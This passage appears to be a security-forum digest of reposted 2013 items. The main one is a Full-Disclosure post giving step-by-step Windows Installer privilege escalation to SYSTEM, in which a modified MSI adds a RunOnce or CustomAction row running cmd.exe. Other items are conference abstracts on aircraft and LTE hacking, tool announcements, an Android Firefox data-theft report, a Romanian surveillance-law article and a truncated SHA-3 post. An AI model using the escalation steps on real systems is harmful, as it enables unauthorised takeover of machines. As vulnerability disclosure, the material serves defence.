Thanks to Yuval Yarom and Katrina Falkner for reporting this vulnerability and for help writing this document. This document was written by Adam Rauf.

Other Information

CVE IDs: CVE-2013-4242
Date Public: 05 Sep 2013
Date First Published: 01 Oct 2013
Date Last Updated: 01 Oct 2013
Document Revision: 33

Sursa: Vulnerability Note VU#976534 - L3 CPU shared cache architecture is susceptible to a Flush+Reload side-channel attack
Paper: http://eprint.iacr.org/2013/448.pdf
  13. Defense in depth -- the Microsoft way (part 10)

From: "Stefan Kanthak" <stefan.kanthak () nexgo de>
Date: Sat, 21 Sep 2013 23:06:13 +0200

Hi @ll,

all products, security patches and hotfixes distributed as self-extracting packages (IExpress, "update.exe" etc.) which contain a *.MSI or *.MSP leave dangling references to these files after their installation. "In certain situations ..." (see below) these dangling references allow a privilege escalation.

Proof of concept (run on a fully patched Windows 7 SP1):

Step 0:
a) login as UNPRIVILEGED user.

Step 1:
a) download the IExpress package "CAPICOM-KB931906-v2102.exe" from <http://www.microsoft.com/en-us/download/details.aspx?id=3207> resp. <http://technet.microsoft.com/security/bulletin/ms07-028>
b) check/verify the Authenticode (digital) signature of the downloaded "CAPICOM-KB931906-v2102.exe"
c) execute the downloaded "CAPICOM-KB931906-v2102.exe" (UAC will ask for confirmation or prompt for administrative credentials):
   * the IExpress installer unpacks its contents into the directory "%TEMP%\IXP000.TMP\", calls MSIEXEC.EXE to install the unpacked "capicom2.msi" and removes the temporary directory afterwards;
   * MSIEXEC.EXE creates the following registry entries with dangling references to the (later) deleted "capicom2.msi" in the removed temporary directory:

[HKEY_CLASSES_ROOT\Installer\Products\9F2FDFE0D6387BE43AD230B83D1FBFA2\SourceList]
"PackageName"="capicom2.msi"
"LastUsedSource"=expand:"n;1;C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\"

[HKEY_CLASSES_ROOT\Installer\Products\9F2FDFE0D6387BE43AD230B83D1FBFA2\SourceList\Media]
"DiskPrompt"="Security Update for CAPICOM (KB931906) Installation Disk"
"1"=";"

[HKEY_CLASSES_ROOT\Installer\Products\9F2FDFE0D6387BE43AD230B83D1FBFA2\SourceList\Net]
"1"=expand:"C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\"

[HKEY_CLASSES_ROOT\Microsoft\Windows\CurrentVersion\Uninstall\{0EFDF2F9-836D-4EB7-A32D-038BD3F1FB2A}]
"InstallSource"="C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\"

Step 2:
a) extract "capicom2.msi" from "CAPICOM-KB931906-v2102.exe" (see <http://support.microsoft.com/kb/197147> for instructions).
b) recreate the directory "%TEMP%\IXP000.TMP\".
c) copy the extracted "capicom2.msi" to "%TEMP%\IXP000.TMP\".
d) check/verify the Authenticode (digital) signature of "%TEMP%\IXP000.TMP\capicom2.msi".
e) open "%TEMP%\IXP000.TMP\capicom2.msi" with the .MSI editor of your choice and insert (for example) the following row into its 'Registry' table:

   REGKEY0,2,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,OUCH!,cmd.exe /k echo %CMDCMDLINE%,COM2000

   or (for example) the following row into its 'CustomAction' table:

   OUCH!,3122,cmd.exe,/k title %USERDOMAIN%\%USERNAME%

f) check the Authenticode signature of the modified "capicom2.msi": it is INVALID now!
g) execute "MSIEXEC.EXE /A %TEMP%\IXP000.TMP\capicom2.msi" and follow the dialogs. Especially notice that NO warning/hint about the broken/invalid Authenticode signature is displayed! OUCH!

Step 3:
a) read <http://support.microsoft.com/kb/944298>:

| In certain situations, Setup cannot find the .msi file in the
| Windows Installer cache. In these situations, Setup tries to
| resolve the source location by testing for the presence of the
| product installation in the last-used location when Setup was
| last run. If Setup cannot resolve the source location, the user
| is prompted to provide the installation media.

b) determine the name of the cached .MSI file, for example via:

   REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\9F2FDFE0D6387BE43AD230B83D1FBFA2\InstallProperties" /v "LocalPackage"

   (its pathname is "%SystemRoot%\Installer\<random>.msi").
c) delete the cached .MSI file found in the substep before. Yes, this needs administrative rights; but read MSKB 944298 again: "in certain situations ...". I just enforce such a certain situation!
d) execute "MSIEXEC.EXE /fm {0EFDF2F9-836D-4EB7-A32D-038BD3F1FB2A}". Again: NO warning/hint about the broken/invalid Authenticode signature is displayed. And: UAC does NOT prompt for confirmation or credentials! If you added a row to the 'CustomAction' table, CMD.EXE runs and shows "NT AUTHORITY\SYSTEM" in its title bar.
e) execute

   REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v "OUCH!"

   and conclude that the modified "%TEMP%\IXP000.TMP\capicom2.msi" was run with administrative (really: "LocalSystem") privileges.

Timeline:
~~~~~~~~~
2008-04-09  informed vendor that MSKB 931906 creates dangling references and MSIEXEC.EXE /f... prompts user for location of capicom2.msi
2008-04-11  vendor asked: "have you tried removing the update via Add/Remove Programs and then re-installing?"
2008-04-11  replied to vendor: that's NOT the point here
            ... no more answer!
2013-05-20  next try...

stay tuned
Stefan Kanthak

PS: as examples for other self-extracting packages use "msxml4-KB2758694-enu.exe" and "msxml6-KB2758696-enu-x86.exe", available from <http://www.microsoft.com/en-us/download/details.aspx?id=36292> and <http://www.microsoft.com/en-us/download/details.aspx?id=36316> resp. <http://technet.microsoft.com/security/bulletin/MS13-002>, which create the following registry entries:

[HKEY_CLASSES_ROOT\Installer\Products\745017A5E85BB88428D8ACA9520A35C3\SourceList]
"PackageName"="msxml6.msi"
"LastUsedSource"=expand:"n;1;c:\\c3d7dd340cec94ff5838ba93\\"

[HKEY_CLASSES_ROOT\Installer\Products\745017A5E85BB88428D8ACA9520A35C3\SourceList\Media]
"DiskPrompt"="[1]"
"1"=";"

[HKEY_CLASSES_ROOT\Installer\Products\745017A5E85BB88428D8ACA9520A35C3\SourceList\Net]
"1"=expand:"c:\\c3d7dd340cec94ff5838ba93\\"

Other products which exhibit the same problem are (not exhaustive, in no particular order):

1. Microsoft Security Essentials

[HKEY_CLASSES_ROOT\Installer\Products\000021599B0090400000000000F01FEC\SourceList]
"PackageName"="dw20shared.msi"
"LastUsedSource"=expand:"n;1;c:\\62bf30c6a367eb52738a55\\x86\\"

[HKEY_CLASSES_ROOT\Installer\Products\000021599B0090400000000000F01FEC\SourceList\Media]
"DiskPrompt"="Microsoft Application Error Reporting"
"1"="OFFICE12;1"

[HKEY_CLASSES_ROOT\Installer\Products\000021599B0090400000000000F01FEC\SourceList\Net]
"1"=expand:"c:\\62bf30c6a367eb52738a55\\x86\\"
"2"=expand:"C:\\Program Files\\Microsoft Security Client\\Backup\\"

[HKEY_CLASSES_ROOT\Installer\Products\BB8DD09375BB24940A92D219E3E4D947\SourceList]
"PackageName"="epp.msi"
"LastUsedSource"=expand:"n;1;c:\\0d149c673ede07404629f38d05a7\\x86\\"

[HKEY_CLASSES_ROOT\Installer\Products\BB8DD09375BB24940A92D219E3E4D947\SourceList\Media]
"1"=";"

[HKEY_CLASSES_ROOT\Installer\Products\BB8DD09375BB24940A92D219E3E4D947\SourceList\Net]
"1"=expand:"C:\\0d149c673ede07404629f38d05a7\\x86\\"
"2"=expand:"C:\\Program Files\\Microsoft Security Client\\Backup\\"

2. .NET Framework 1.1

[HKEY_CLASSES_ROOT\Installer\Products\DDE7F2BCF1D91C3409CFF425AE1E271A\SourceList]
"PackageName"="netfx.msi"
"LastUsedSource"=expand:"n;1;C:\\DOCUME~1\\Owner\\LOCALS~1\\Temp\\IXP000.TMP\\"

[HKEY_CLASSES_ROOT\Installer\Products\DDE7F2BCF1D91C3409CFF425AE1E271A\SourceList\Media]
"DiskPrompt"="[1]"
"1"=";Microsoft .NET Framework 1.1 [Disk 1]"
...
"21"="URTSTDD1;Microsoft .NET Framework 1.1 [Disk 1]"
...

[HKEY_CLASSES_ROOT\Installer\Products\DDE7F2BCF1D91C3409CFF425AE1E271A\SourceList\Net]
"1"=expand:"C:\\DOCUME~1\\Owner\\LOCALS~1\\Temp\\IXP000.TMP\\"

[HKEY_CLASSES_ROOT\Installer\Patches\7FCDE114D557E4147AB4D3DC56385F98\SourceList]
"PackageName"="tmp517.tmp"
"LastUsedSource"=expand:"n;1;C:\\DOCUME~1\\Owner\\LOCALS~1\\Temp\\IXP000.TMP\\"

[HKEY_CLASSES_ROOT\Installer\Patches\7FCDE114D557E4147AB4D3DC56385F98\SourceList\Media]
"DiskPrompt"="[1]"
"20872"=";Microsoft .NET Framework 1.1 Service Pack 1 (KB867460)"

[HKEY_CLASSES_ROOT\Installer\Patches\7FCDE114D557E4147AB4D3DC56385F98\SourceList\Net]
"1"=expand:"C:\\DOCUME~1\\Owner\\LOCALS~1\\Temp\\IXP000.TMP\\"
...

3. Visual C++ 2005 Redistributable 8.0.56336

[HKEY_CLASSES_ROOT\Installer\Products\b25099274a207264182f8181add555d0\SourceList]
"PackageName"="vcredist.msi"
"LastUsedSource"=expand:"n;1;C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP001.TMP\\"

[HKEY_CLASSES_ROOT\Installer\Products\b25099274a207264182f8181add555d0\SourceList\Media]
1=";Microsoft Visual C++ 2005 Redistributable [Disk 1]"
DiskPrompt="[1]"

[HKEY_CLASSES_ROOT\Installer\Products\b25099274a207264182f8181add555d0\SourceList\Net]
"1"=expand:"C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP001.TMP\\"

4. Visual C++ 2005 Redistributable (x64) 8.0.59192

"PackageName"="vcredist.msi"
"LastUsedSource"=expand:"n;1;C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP001.TMP\\"

5. Visual C++ 2005 Redistributable (x64) 8.0.61000

"PackageName"="vcredist.msi"
"LastUsedSource"=expand:"n;1;C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\"

6. Virtual PC 2007 Service Pack 1

[HKEY_CLASSES_ROOT\Installer\Products\899384DAA9E2504438FFE605A34FC9BB\SourceList]
"PackageName"="Virtual_PC_2007_Install.msi"
"LastUsedSource"="n;1;C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\"

[HKEY_CLASSES_ROOT\Installer\Products\899384DAA9E2504438FFE605A34FC9BB\SourceList\Media]
"1"=";"

[HKEY_CLASSES_ROOT\Installer\Products\899384DAA9E2504438FFE605A34FC9BB\SourceList\Net]
"1"=expand:"C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\"

[HKEY_CLASSES_ROOT\Installer\Patches\F932FFF94C172E04DAC6E2E68C62E958\SourceList]
"PackageName"="KB958162.msp"
"LastUsedSource"=expand:"n;1;C:\\Users\\Owner\\Downloads\\"

[HKEY_CLASSES_ROOT\Installer\Patches\F932FFF94C172E04DAC6E2E68C62E958\SourceList\Media]
"100"=";"

[HKEY_CLASSES_ROOT\Installer\Patches\F932FFF94C172E04DAC6E2E68C62E958\SourceList\Net]
"1"=expand:"C:\\Users\\Owner\\Downloads\\"
"2"=expand:"PatchSourceList"

7. Windows Media Player Firefox Plugin

[HKEY_CURRENT_USER\Software\Microsoft\Installer\Products\6BBFDF96D153C8B4988D68D79C0D2A4A\SourceList]
"PackageName"="ffplugin.msi"
"LastUsedSource"="n;1;C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\"

[HKEY_CURRENT_USER\Software\Microsoft\Installer\Products\6BBFDF96D153C8B4988D68D79C0D2A4A\SourceList\Media]
"DiskPrompt"="Windows Media Player Firefox Plugin Installation"
"1"=";CD-ROM #1"

[HKEY_CURRENT_USER\Software\Microsoft\Installer\Products\6BBFDF96D153C8B4988D68D79C0D2A4A\SourceList\Net]
"1"=expand:"C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\"

_______________________________________________
Full-Disclosure - We believe in it. Charter: [Full-Disclosure] Mailing List Charter
Hosted and sponsored by Secunia - Computer Security - Software & Alerts - Secunia

Sursa: Full Disclosure: Defense in depth -- the Microsoft way (part 10)
  14. Hitb 2013 - Hugo Teso - Aircraft Hacking: Practical Aero Series

Description:

PRESENTATION ABSTRACT: This presentation will be a practical demonstration of how to remotely attack and take full control of an aircraft, exposing some of the results of my three years of research in the aviation security field. The attack performed will follow the classical methodology, divided into discovery, information gathering, exploitation and post-exploitation phases. The complete attack will be accomplished remotely, without needing physical access to the target aircraft at any time, and a testing laboratory will be used to attack virtual airplane systems. The ADS-B and ACARS protocols will be used during the discovery and information gathering phases, but neither of those protocols is the objective of this research; I will just use them to plot and analyze the potential targets. Very basic information on such protocols will be presented, as well as additional references for further reading. The real targets of the attacks will be some on-board systems, complex enough to be vulnerable to (almost) common vulnerability research and exploitation techniques. Different post-exploitation vectors will finally be considered in order to gain better aircraft control.

ABOUT HUGO TESO

Hugo Teso works as a security consultant at n.runs AG in Germany. He has been working in IT security for the last 11 years, mainly in Spain. Also being a commercial pilot, it was just a matter of time before he focused his attention on aviation security. Together with the development of some open source projects, like Inguma and Bokken, he has spent a lot of time on aviation security research and has presented some of the results at conferences like RootedCon.

For More Information please visit : - HITBSecConf - NETHERLANDS / MALAYSIA

Sursa: Hitb 2013 - Hugo Teso - Aircraft Hacking: Practical Aero Series
  15. Hitb 2013 - Philippe Langlois - Lte Pwnage - Hacking Core Network Elements

Description:

PRESENTATION ABSTRACT: Phrack and other magazines used to be full of obscure hardware and systems descriptions for telecom equipment that were the pride and the thrill of many dark-corner hackers. There's a specific kink about these strange OS, protocols and interfaces. But sadly (or not, as we'll see), it's a gone era. Gone are the DMS100, the DX200, the COSMOS switches and other telecom legacy beauty, ahem, well, at least it SHOULD BE GONE.

Today, we're entering the realm of LTE super-high-speed always-on connectivity, and with that comes the victory of TCP/IP over the old ITU/3GPP protocols. And with this come many side effects: software gets standardized, everything runs on top of ATCA (Advanced Telecom Computing Architecture) hardware running mostly Linux (give or take 6 or 8 proprietary FPGA-based sister cards, TFTP-booted with decade-old VxWorks that routinely shows hardcoded DES credentials and funny "behaviour"). Easily 20 GB of fat C++ binaries, some for x86, PPC, MIPS, some with up to 200 MByte file sizes for one single EXE! It's called a vulnerability research and reverse engineering paradise... or hell.

All the protocols now run on top of IP, which ends up having 12 layers thanks to encapsulation, and the weight of legacy still shows in bug quantity and diversity. We'll see how the porting of SS7 MAP on top of IP (SIGTRAN, Diameter) has given rise to funny Denial of Service (DoS) attacks against telecom core elements (DSR, STP), with trashy-crashy anti-forensics consequences for DPI and tracking (Hey @grugq!!). We'll look into specific vulnerabilities, and talk about the very particular way that Network Equipment Vendors deal with security in the telecom domain. We will demo a virtualized Huawei HSS from our testbed and show some of the vulnerabilities and attacks directly on the equipment itself.

We will finally talk about telco equipment and product security reviews and the fallacy of (some) certification and (many) standardization attempts. We will then see how to conduct a practical and fast telecom product security life cycle with automation and open source tools.

ABOUT PHILIPPE LANGLOIS

Philippe Langlois is an entrepreneur and leading security researcher, expert in the domain of telecom and network security. He has founded internationally recognized security companies (Qualys, WaveSecurity, INTRINsec, P1 Security) as well as led technical, development and research teams (Solsoft, TSTF). He founded Qualys and led the world-leading vulnerability assessment service. He founded a pioneering network security company, Intrinsec, in 1995 in France. His first business, Worldnet, France's first public Internet service provider, was founded in 1993. Philippe was also lead designer for Payline, one of the first e-commerce payment gateways. He has written and translated security books, including some of the earliest references in the field of computer security, and has been giving speeches on network security since 1995 (Interop, BlackHat, HITB, Hack.lu). He was previously a professor at Ecole de Guerre Economique and various universities in France (Amiens, Marne La Vallée) and internationally (FUSR-U, EERCI, ANRSI). He is a FUSR-U collaborator and founding member. Philippe advises industry associations (GSM Association Security Group, several national organizations) and governmental officials, and contributes to Critical Infrastructure advisory committees and conferences in Telecom and Network security. Now, with P1 Security, Philippe provides the first Core Network Telecom Signaling security scanner and auditor, which helps telecom companies, operators and governments analyze where and how their critical telecom network infrastructure can be attacked.

He can be reached through his website at: P1 Security

For More Information please visit : - HITBSecConf - NETHERLANDS / MALAYSIA

Sursa: Hitb 2013 - Philippe Langlois - Lte Pwnage - Hacking Core Network Elements
  16. Derbycon 2013 - Scanning Darkly - Hd Moore

Description:

Bio: HD Moore is the Chief Research Officer at Rapid7, responsible for leading Rapid7 Labs research into real world threats and providing guidance on how to address them. In addition, HD drives technical innovation across Rapid7's products and services, applying technology to the challenge of identifying and defending against current and emerging threats, as well as heading the development of experimental prototypes and free tools. HD is the creator and chief architect of Metasploit, the world's leading open source penetration testing framework, and remains deeply involved in Metasploit's evolution at the architectural level.

For More Information please visit : - Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos)

Sursa: Derbycon 2013 - Scanning Darkly- Hd Moore
  17. snuck : Automatic XSS filter bypass Tool

Reported by Sabari Selvan on Tuesday, October 23, 2012

snuck is an automated tool that may definitely help in finding XSS vulnerabilities in web applications. It is based on Selenium and supports Mozilla Firefox, Google Chrome and Internet Explorer. The approach it adopts is based on the inspection of the injection's reflection context, and it relies on a set of specialized and obfuscated attack vectors for filter evasion. In addition, XSS testing is performed in-browser: a real web browser is driven to reproduce the attacker's behavior, and possibly the victim's.

Description

snuck is quite different from typical web security scanners; it basically tries to break a given XSS filter by specializing the injections in order to increase the success rate. The attack vectors are selected on the basis of the reflection context, that is, the exact point where the injection falls in the reflecting web page's DOM. Having access to the page's DOM is possible through Selenium WebDriver, an automation framework that allows operations to be replicated in web browsers. Since many steps could be involved before an XSS filter is "activated", an XML configuration file should be filled in to make snuck aware of the steps it needs to perform with respect to the tested web application. Practically speaking, the approach is similar to iSTAR's, but it focuses on one particular XSS filter.

Download it from here: Downloads - snuck - Automatic XSS filter bypass - Google Project Hosting

Tutorial can be found here: Tutorial - snuck - how to use snuck - Automatic XSS filter bypass - Google Project Hosting
  18. A grave and reckless move: USL gave the DNA free rein on wiretaps. Prosecutors may even break into the bedroom

Tuesday, October 1, 2013 / 14:32
Written by Oana Stănciulescu

The USL majority in Parliament has no idea what it is voting for. Although they shout that case files are fabricated on political orders because of wiretaps, they have granted unlimited powers to the anti-corruption prosecutors, writes pesurse.ro. In the new Code of Criminal Procedure, which takes effect in February 2014, the coalition's parliamentarians voted for two of the paragraphs slipped into art. 12 of Law no. 51/91, adopted through art. 29 of Law no. 255/2013, which provide that the services may enter suspects' homes whenever they wish, including by breaking and entering, and film them even in the bedroom, with all information obtained this way then serving as crushing evidence in court.

The parliamentarians of the current governing coalition voted, most likely without reading it, for Law no. 255, which was published in the Official Gazette of 14.08.2013. It concerns the implementation of Law no. 135/2010 on the Code of Criminal Procedure and the amendment and completion of certain normative acts containing criminal procedure provisions. Among the amendments adopted by the distinguished USL parliamentarians is one providing that "Law no. 51/91 on the national safety of Romania" becomes the "Law on the national security of Romania". The shift from "safety" to "security" can also be explained by the hidden implications of a few of the ten new articles thus introduced into the law, reports Național.

What the parliamentary majority voted for

USL voted for an unprecedented extension of the "specific activities that may be carried out by the bodies with responsibilities in the field of national security". Thus, art. 12(2) lit. a) provides for "the interception and recording of electronic communications, carried out in any form". Other paragraphs permit the interception, again "in any form", of all other possible means of communication, from telephones to postal telegrams, including locating a suspect by satellite.

Likewise, lit. c) provides for "the removal and replacement of an object or document, its examination, the extraction of the information it contains, as well as its recording, copying or the obtaining of extracts by any means". In practice, starting in February, undercover officers may legally break into an office, plant cameras there, and then return whenever they wish, again like sneak thieves, to remove the microphones or plant new ones. For the first time, such operations may be carried out not only in public places but also in suspects' homes.

Under lit. d), the distinguished parliamentarians also voted to permit "the installation of objects, their maintenance and their removal from the places where they were planted, surveillance by photography, filming or other technical means, or personal observation, carried out systematically in public places or carried out in any manner in private places". Thus any citizen can be recorded even in the bedroom, in intimate moments with his mistress or wife.

At the same time, under the new Code of Criminal Procedure, those hoping to escape the DNA are mistaken. Chapter 2, art. 5(3) specifies: "in the trial of cases and the resolution of proposals, challenges, complaints or any other requests in which the criminal investigation was carried out by the National Anticorruption Directorate under the old law, (....), prosecutors from the DNA shall participate". That is what the distinguished USL majority voted for in Parliament!

Sursa: Gest grav și inconștient: USL a dat mână liberă DNA la interceptări. Procurorii pot intra prin efracție chiar și în dormitor | ExpresMagazin
  19. Android's Firefox app Vulnerability allows hacker to steal files from SD card Author: Mohit Kumar, The Hacker News - Tuesday, October 01, 2013 Mobile Browsers are complicated applications and locking them down against threats is extremely difficult. According to a Mobile Security Researcher, Sebastián Guerrero from 'viaForensics', Android's Firefox browser app is vulnerable to Hackers. He responsibly disclosed the details to Mozilla, that allows hackers to access both the contents of the SD card and the browser's private data. He posted a video showing how hackers will be able to access data on the device. The flaw works only if a user install a malicious application or opened a locally stored HTML file in the vulnerable Firefox app that included malicious Javascript code. Successful Exploitation allows attacker to access to files on the SD Card including all of users’ cookies, login credentials, bookmarks etc. This is a privacy issue and could be severe depending on what is stored there, including personal pictures and video, or data placed there by other applications. http://www.youtube.com/watch?v=q74g58kX5lQ&feature=player_embedded Files are accessed through the standard “file://” URI syntax. Firefox encrypts the data stored in internal storage which is why hackers also introduce a third-party app which gets the encrypted keys stored on the device. "However, to protect the most sensitive information, apps can place data in a separate location called internal storage, a private folder for each app that even the user is prevented from accessing directly (unless the device is rooted). The most significant threat from this vulnerability is that the secured location for Firefox is also accessible, which means a hacker will have access to cookies, login credentials, bookmarks, and anything else Mozilla think should be kept safely tucked away." Androidpolice blog explained. 
We contacted Sebastián to get more details; please find a quick FAQ on the matter below: Q. Can an attacker host the malicious JavaScript/HTML file on a server and exploit the flaw remotely, just by making the victim visit the website? A. The exploit cannot be executed by a remote web page. This flaw works only if you install an application, but there is another vulnerability in Firefox that could allow an attacker to install applications without the user's knowledge. I disclosed it to Firefox, but another researcher did the same before me. It is, however, possible to host the malicious HTML file somewhere and, using some social engineering, trick the victim into downloading and opening the file locally in their Firefox app. Q. To steal files from the victim's SD card, does the attacker need to pre-define the file names or folder paths in the exploit code? A. No, there is no need to specify the path, because I'm obtaining the salted folder generated by Firefox at runtime, due to a vulnerability. I can make a copy of the SD card, because its path will always be /sdcard, and for the private folder located at /data/data/org.mozilla.firefox I'm obtaining the salted profile generated at runtime. Q. Where and how will the stolen files be uploaded? A. You can upload them wherever you want, i.e. in the exploit code we open a socket connection to a remote FTP server and upload the stolen files. Q. Is there a CVE ID or Mozilla Security Advisory ID assigned to the vulnerability yet? A. As far as I know there isn't a CVE assigned to this vulnerability. Mozilla has patched it in Firefox 24 for Android. Just a few weeks back, a Russian hacker put a zero-day exploit up for sale that forces the Android Firefox browser to download and execute a malicious app. Sursa: Android's Firefox app Vulnerability allows hacker to steal files from SD card - The Hacker News
  20.
    drozer: The Leading Security Testing Framework for Android. drozer enables you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS. drozer provides tools to help you use and share public Android exploits, and helps you to deploy a drozer agent by using weasel – MWR's advanced exploitation payload. For the latest drozer updates, follow @mwrdrozer.

[h=3]Features[/h]

drozer allows you to use dynamic analysis during an Android security assessment. By assuming the role of an Android app you can:

- find information about installed packages.
- interact with the 4 IPC endpoints – activities, broadcast receivers, content providers and services.
- use a proper shell to play with the underlying Linux OS (in the context of an unprivileged application).
- check an app's attack surface, and search for known vulnerabilities.
- create new modules to share your latest findings on Android.

drozer's remote exploitation features provide a unified framework for sharing Android payloads and exploits. It helps to reduce the time needed for vulnerability assessments and mobile red-teaming exercises, and includes the outcome of some of MWR's cutting-edge research into advanced Android payloads and exploits.

[h=3]How it Works[/h]

drozer does all of this over the network: it does not require ADB.

Download: https://www.mwrinfosecurity.com/products/drozer/community-edition/ Sursa: https://labs.mwrinfosecurity.com/tools/drozer/
  21. Offtopic: National Institute of Standards and Technology Page Not Found Due to a lapse in government funding, the National Institute of Standards and Technology (NIST) is closed and most NIST and affiliated web sites are unavailable until further notice. We sincerely regret the inconvenience. The National Vulnerability Database and the NIST Internet Time Service web sites will continue to be available. A limited number of other web sites may also be available.
  22. What the heck is going on with NIST’s cryptographic standard, SHA-3? by Joseph Lorenzo Hall September 24, 2013 (Warning: this is a fairly technical post about cryptographic standards setting.) The cryptographic community has been deeply shaken since revelations earlier this month that the National Security Agency (NSA) has been using a number of underhanded methods – stealing encryption keys, subverting standards setting processes, planting backdoors in products – to undermine much of the encryption used online. This includes crucial pieces of e-commerce like HTTPS (SSL/TLS) and Virtual Private Networks (VPN) that we use each day to purchase things online, to socialize in private, and that businesses use to communicate confidential and proprietary information. While the reporting has been vague and hasn’t pointed to specific software versions or protocols that have been compromised, last week RSA Security – a major supplier of cryptographic software and hardware – initiated a product recall of sorts, warning users that one of its popular software encryption products contained a likely NSA-planted backdoor. The practical implication of the RSA recall is that much of the encryption that used this product since 2007 isn’t nearly as secure as it was supposed to be. Those of us who follow developments in the cryptographic community have noticed another troubling development: there are a number of cryptographers upset with how the National Institute of Standards and Technology (NIST) is standardizing a new set of encryption algorithms called SHA-3 (which stands for the third version of the Secure Hashing Algorithm). The remainder of this post explains what is going on with SHA-3 and how NIST could defuse this particular controversy while it still has the chance. 
(Warning: In this post, I’m assuming the reader is familiar with the concepts underlying basic encryption tools, called “cryptographic primitives,” such as hash functions, digital signatures, and message authentication codes.) What is SHA-3? SHA-3 is the “next generation” hash algorithm being standardized by NIST. In 2005, researchers developed an attack that called into question the security guarantees of an earlier secure hash algorithm, SHA-1. The characteristics of this 2005 attack seemed to hint that it could be refined to attack many of the secure hash functions at the time, including SHA-0, MD4, MD5 and even SHA-2. At the time, for many cryptographers, the message was clear: a new hash algorithm is needed and it should be based on completely different underlying mathematics that are not susceptible to the attacks threatening known hash functions. To be clear: SHA-1 is thought to be on its way out, as people expect the earlier attacks to be improved considerably in the coming years and there hasn’t been any result that calls into question the soundness of SHA-2 at all. Attacks always improve, so it’s imperative that there is an alternative hash function ready to go when and if the floor falls out of the earlier hash functions. NIST’s cryptographic technology group is world-renowned for cryptographic algorithm standardization. In 2007, NIST began the process to develop and standardize a new secure hash algorithm that would be called SHA-3. The process for choosing a new algorithm was designed as a competition: new candidate algorithms were submitted by more than 60 research teams and over five years the entrants were whittled down to a set of finalists, from which a winner was chosen. In October of last year, NIST announced that a team of Italian and Belgian cryptographers had won the competition with their submission named, “Keccak” (pronounced “KECH-ack”). What has NIST done with SHA-3? 
Since the announcement of Keccak as the winner, NIST has been working hard to turn Keccak into a standard. That is, NIST can't just point to the academic paper and materials submitted by the Keccak team and call that a standard. NIST has to write the algorithm up in a standards-compliant format and include it in other NIST cryptographic standards documents, such as a successor to the Secure Hash Standard document (FIPS Publication 180-4). Here's where the controversy starts. One of the most accomplished civilian cryptographers, NIST's John Kelsey, gave an invited talk at a conference in August, the Workshop on Cryptographic Hardware and Embedded Systems 2013 (CHES'13), where he described some of the changes NIST has made to Keccak in turning it into a standard. The changes were detailed in five slides (slides 44-48) of Kelsey's slide deck for his talk. Two major changes puzzled some in attendance:

1. In the name of increased performance (running faster in software and hardware), the security levels of Keccak were drastically reduced. The four versions of the winning Keccak algorithm had security levels of 224-bits, 256-bits, 384-bits, and 512-bits. However, from Kelsey's slides, NIST intends to standardize only two versions, a 128-bit and a 256-bit version.
2. Some of the internals of the algorithm had been tweaked by NIST – some in cooperation with the team that submitted Keccak – to improve performance and allow for new types of applications.

Essentially, NIST had changed Keccak to something very different from what won the 5-year competition. Since this talk, cryptographers have been abuzz with this news and generally very critical of the changes (e.g., folks like Marsh Ray on Twitter). What are the issues with SHA-3 standardization? So, what's the big deal? Well, the problems here cluster in five areas: Process: From a simple due process perspective, after a five-year hard-fought competition, to make large changes to the winning algorithm is simply problematic. 
The algorithm being standardized is very different from the winning Keccak, which beat 62 other high-powered cryptography research groups in a 5-year competition. (To be fair, it's not like these changes came out of the blue. However, given the new political environment, reality itself has changed.) No security improvement: The SHA-3 version of Keccak being proposed appears to provide essentially the same level of security guarantees as SHA-2, its predecessor. If we are going to develop a next-generation hash, there certainly should be standardized versions that provide a higher security level than the older hash functions! NIST, in the original call for submissions, specifically asked for four versions in each submission, with at least two that would be stronger than what was currently available, so it's hard to understand this post-competition weakening. Unclear implications of internal changes: The changes made to Keccak to get to SHA-3 may be so substantial as to render the cryptanalysis that was performed during the competition moot. That is, all the intense number crunching cryptographers performed during the competition to try and break the submitted ciphers to prove their strength/weakness simply doesn't apply to the modified form of Keccak that NIST is working on. No real need for high-performance hashes: NIST said it weakened the security levels of the winning Keccak submission to boost performance. (Weaker versions of hash functions run faster.) However, there is not clearly a need for another fast hash algorithm. For example, to get exceedingly technical for a moment: in communications security, hashes are used for a few purposes and most are computed on small inputs – where performance isn't a concern – and in cases where performance is a concern due to large inputs (e.g., with "message authentication codes" or MACs), many applications are moving away from hash-based MACs (HMAC) to other types of MACs like GMAC that are not based on hash functions. 
NIST's reputation is undermined: Kelsey's CHES'13 talk was given in mid-August, two weeks before the NSA encryption revelations. Those revelations suggest that the NSA, through an intelligence program called BULLRUN, actively worked to undermine NIST's effort to standardize strong cryptography. NIST could not have known how the changes it made might appear once that reporting had cast a pall over NIST cryptographic standards setting. The changes made to Keccak undoubtedly weaken the algorithm, calling NIST's motives into question in light of the NSA revelations (regardless of their actual intentions). None of this is irreversible. What could NIST do to defuse this controversy? Kelsey's slides indicate that NIST is on track to standardize the NIST-modified version of Keccak as SHA-3 and issue a draft standard in late October for public comment. If the issues above are not addressed in that draft standard, there will be considerable hue and cry from the cryptographic community and it will only serve to reinforce the more general concerns about NIST's cooperation with the NSA. It's in no one's interest to feed the flames of NIST scaremongering and we all have an interest in NIST as a trusted place for science and standardization. In that spirit, there are a number of things NIST can do to calm this storm (and please consider joining NIST's Hash Forum to discuss this further): Add back high-security modes: NIST must ensure that SHA-3 has strong modes of operation. NIST should at least add back in a 512-bit security level version of Keccak so those users who want exceedingly high security and don't worry as much about performance have a standardized mode that they can use. In fact, if NIST is worried about performance, it probably makes sense to standardize the as-submitted versions of Keccak (224, 256, 